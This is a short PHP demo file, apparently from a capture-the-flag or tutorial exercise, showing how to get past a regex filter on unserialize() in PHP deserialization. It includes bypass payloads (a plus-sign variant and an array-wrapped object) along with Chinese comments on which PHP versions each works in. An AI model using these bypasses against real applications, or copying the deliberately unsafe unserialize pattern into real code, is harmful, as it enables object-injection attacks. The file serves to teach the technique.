<?php
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
class test{
    public $a= 'flag:{hellowordhhh}';
  
    public function  __destruct(){
        echo $this->a;
    }
}
 
function match1($data){
    if (preg_match('/^O:\d+/',$data)){
        die('byebye');
    }else{
        return $data;
    }
}
$a = 'O:+4:"test":1:{s:1:"b";s:3:"abc";}';
// +号绕过在高版本php不可行
unserialize(match1($a));
// 将对象放入数组绕过 serialize(array($a));这个在较高版本php可行
// unserialize('a:1:{i:0;O:4:"test":1:{s:1:"a";s:3:"abc";}}');

?>